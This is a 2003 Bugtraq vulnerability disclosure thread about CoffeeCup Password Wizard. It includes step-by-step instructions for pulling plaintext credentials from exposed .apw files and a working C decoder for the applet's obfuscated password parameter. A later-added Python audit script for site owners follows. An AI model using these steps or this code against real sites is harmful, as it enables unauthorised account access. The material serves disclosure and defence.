[29130] in bugtraq


Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

daemon@ATHENA.MIT.EDU (Per-Ola Kristiansson)
Mon Mar 3 13:55:23 2003

Message-ID: <007701c2e119$1795cb00$3137fea9@ll>
From: "Per-Ola Kristiansson" <admin@swesign.com>
To: <bugtraq@securityfocus.com>
Date: Mon, 3 Mar 2003 01:08:59 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0074_01C2E121.786D6200"

------=_NextPart_000_0074_01C2E121.786D6200
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

The Java version is also vulnerable. The username, password and secret URL
can be extracted from the param "0" in the HTML code. I wrote a small
program for this purpose a couple of months ago.

Password Wizard java sample: http://www.coffeecup.com/java-password/samples/

<applet code="joylock.class" width=342 height=140>
<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM">
<param name="GENERAL" value="1|11|004080|FFFFFF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
<param name="0" value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev">
</applet>

Best regards,
Per-Ola Kristiansson


----- Original Message -----
From: "Rynho Zeros Web" <hackargentino@gmx.net>
To: <bugtraq@securityfocus.com>
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions


> + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
> Versions
>
> + Product: CoffeeCup Password Wizard All Versions
>
> + Vendor: CoffeeCup Software, Inc.
>
> + Site: http://www.coffeecup.com/java-password/
>
> + About CoffeeCup Password Wizard: Create unlimited password protected pages
> with unlimited usernames and passwords with CoffeeCup Password Wizard.
> You don't even have to know Flash, Java, or HTML ! Customize the look and
> feel to match your page. You can even point different users to different
> URLs ! Preview within the program or your favorite browser. It's all that
> easy ! All this and more make CoffeeCup Password Wizard the easiest way
> to password protect your pages ! (¿?)
>
> + Description: Easy obtaining of names of users, passwords and a URL
>  of direct access to the preferences of the same one.
>
> + Exploit:
>
> Go to the login panel and view the HTML source code to find the location
> of the .swf file used for the login.
>
> Example:
>
> Go to
> https://www.victim.com/billing/
>
> See sourcecode,
>
> [...]
>         ID=billing WIDTH=146 HEIGHT=125>
>         <PARAM NAME=movie VALUE="billing.swf">
>         <PARAM NAME=quality VALUE=high>
> [...]
>
> (https://www.victim.com/billing/billing.swf)
>
> The password file has the same name as the login file, but with
> the extension .apw
>
> Now go to and download the file:
> https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
> Wizard File)
>
> Finally, open this file with any text editor to find all the users
> with their passwords and the URL of direct access to their options.
>
> Example of passwords file:
>
> --------- billing.apw -----------
>
> COFFEECUP PASSWORD WIZARD FILE
> WWW.COFFEECUP.COM
> PLEASE DO NOT EDIT!!!!
>
> MOVIE WIDTH:120
> MOVIE HEIGHT:100
> MOVIE FRAME RATE:0
> MOVIE BK COLOR:$00ECECEC
> MOVIE DEFAULT URL:
> MOVIE DEFAULT FRAME:
> MOVIE SWF NAME:billing.swf
> MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billing\
> MOVIE FONT NAME:MS Sans Serif
> MOVIE FONT SIZE:8
> MOVIE FONT COLOR:clBlack
> MOVIE TRANSPARENT TRUE
> MOVIE VERTICAL TRUE
>
> USER BOX LEFT:2
> USER BOX TOP:1
> USER BOX WIDTH:116
> USER BOX HEIGHT:34
> USER BOX CAPTION:Username
>
> PASS BOX LEFT:2
> PASS BOX TOP:36
> PASS BOX WIDTH:116
> PASS BOX HEIGHT:34
> PASS BOX CAPTION:Password
>
> BUTTON LEFT:15
> BUTTON TOP:78
> BUTTON WIDTH:90
> BUTTON HEIGHT:20
> BUTTON PATH:
> BUTTON TX:1
> BUTTON TY:1
>
> ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
> ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
> [...]
> END
>
> --------- billing.apw -----------
>
> Example of user & pass on billing:
>
> user: anyweb
> pass: xnet0305
> url option panel: https://www.victim.com/billing/anyweb0001.htm
>
>
> ----------------------------------------------------------------
>
> [EOF]
>
> -----------------------------------------------
> Credits: ToOcOoL (http://www.valenciahack.com/)
> -----------------------------------------------
>
> --------------------------------
> Note: sorry by my bad english ;)
> --------------------------------
>
> --
> XyBØrG
> WebMaster of:
> www.RZWEB.com.ar
> Powered By Dattatec.Com
>
>

------=_NextPart_000_0074_01C2E121.786D6200
Content-Type: application/octet-stream;
	name="passwiz.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="passwiz.c"

// Exploit for Coffee Cup Password Wizard
// By THR (admin@swesign.com)

#include <stdio.h>
#include <stdlib.h>

int main(void) {
	char *passwd, *uname, *url, *target;
	// Value of param "0" from the applet sample: four '|'-terminated
	// lengths, then the encoded string.
	char param[] = "6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev";
	char enc[1024];
	char dec[1024];
	char tmp[5];
	int size[4] = {0};	// user, password, URL and target lengths (four slots are used)
	int a=0,x=0,y=0,z=0;
	// Split off the four length fields; the remainder is copied into enc.
	while(param[x]) {
		if(y<=3) {
			if(param[x]=='|') {
				tmp[a]=0;
				a=0;
				size[y]=atoi(tmp);
				y++;
			} else if(a<4) {	// keep room for the terminator in tmp[5]
				tmp[a]=param[x];
				a++;
			}
		} else {
			enc[z]=param[x];
			z++;
		}
		x++;
	}
	enc[z]=0;
	x=0;
	// The first 26 characters of enc are the substitution key:
	// a lowercase letter c decodes to enc[c-'a'], an uppercase
	// letter indexes enc[26..51], anything else is copied as is.
	while(enc[x]) {
		if(enc[x]>=65 && enc[x]<=90)
			dec[x]=enc[enc[x]-39];
		else
			if(enc[x]>=97 && enc[x]<=122)
				dec[x]=enc[enc[x]-97];
			else
				dec[x]=enc[x];
		x++;
	}
	dec[x]=0;
	if (!(uname = (char*) malloc((size[0]+1) * sizeof(char))) ||
		!(passwd = (char*) malloc((size[1]+1) * sizeof(char))) ||
		!(url = (char*) malloc((size[2]+1) * sizeof(char))) ||
		!(target = (char*) malloc((size[3]+1) * sizeof(char)))) {
		printf("Memory error\n");
		return(1);
	}
	// The decoded fields follow the 26-character key, back to back.
	y=0;
	z=26;
	for(x=z,y=0;x<size[0]+z;x++,y++)
		uname[y]=dec[x];
	uname[y]=0;
	z+=size[0];
	for(x=z,y=0;x<size[1]+z;x++,y++)
		passwd[y]=dec[x];
	passwd[y]=0;
	z+=size[1];
	for(x=z,y=0;x<size[2]+z;x++,y++)
		url[y]=dec[x];
	url[y]=0;
	z+=size[2];
	for(x=z,y=0;x<size[3]+z;x++,y++)
		target[y]=dec[x];
	target[y]=0;

	printf ("User: \t\t%s\nPassword: \t%s\nLink: \t\t%s\nTarget: \t%s\n",uname, passwd, url, target);

	free (passwd);
	free (uname);
	free (url);
	free (target);
	return(0);
}

------=_NextPart_000_0074_01C2E121.786D6200--
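
Added example (not part of the original post or its attachment): a Python audit a site owner can run over a local document root to find the two exposures described in this thread, a .apw project file published beside its .swf and joylock.class applet markup carrying numbered credential params. The function names and the sample tree are constructed for illustration; the sample contents are the snippets quoted above.

```python
import os
import re

# Numbered applet param as quoted in the thread: four lengths, a 26-letter key, then payload.
PARAM_RE = re.compile(
    r'<param\s+name="?\d+"?\s+value="\d+\|\d+\|\d+\|\d+\|[A-Za-z]{26}', re.I)
APPLET_RE = re.compile(r'<applet[^>]*\bcode="?joylock\.class', re.I)
ADD_USER_RE = re.compile(r"^ADD USER:", re.M)
EXTS = (".apw", ".swf", ".htm", ".html")

def audit(files):
    """files maps a web-relative path to its text; returns sorted (path, finding) pairs."""
    findings = []
    names = {p.lower() for p in files}
    for path, text in files.items():
        low = path.lower()
        if low.endswith(".apw"):
            where = " beside its .swf" if low[:-4] + ".swf" in names else ""
            users = len(ADD_USER_RE.findall(text))
            findings.append((path, "project file in web root%s, %d account(s) to rotate"
                             % (where, users)))
        elif low.endswith((".htm", ".html")) and APPLET_RE.search(text):
            hits = len(PARAM_RE.findall(text))
            if hits:
                findings.append((path, "%d credential param(s) in applet markup" % hits))
    return sorted(findings)

def audit_dir(root):
    """Collect candidate files under root (a local document root) and audit them."""
    files = {}
    for base, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(EXTS):
                full = os.path.join(base, name)
                with open(full, encoding="latin-1") as fh:
                    files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return audit(files)

# Constructed sample tree assembled from the snippets quoted in the thread.
SAMPLE = {
    "billing/billing.swf": "",
    "billing/billing.apw": "COFFEECUP PASSWORD WIZARD FILE\n"
        "ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm\n"
        "ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm\nEND\n",
    "members/login.html": '<applet code="joylock.class" width=342 height=140>\n'
        '<param name="0"\nvalue="6|4|36|0|cftzmapuxnrsjibgwykqvleodh'
        'lfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev">\n'
        "</applet>",
}
```

Every account listed in a flagged .apw file, and every credential carried in flagged applet markup, should be treated as disclosed: remove the file from the served tree and move the check to the server side.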


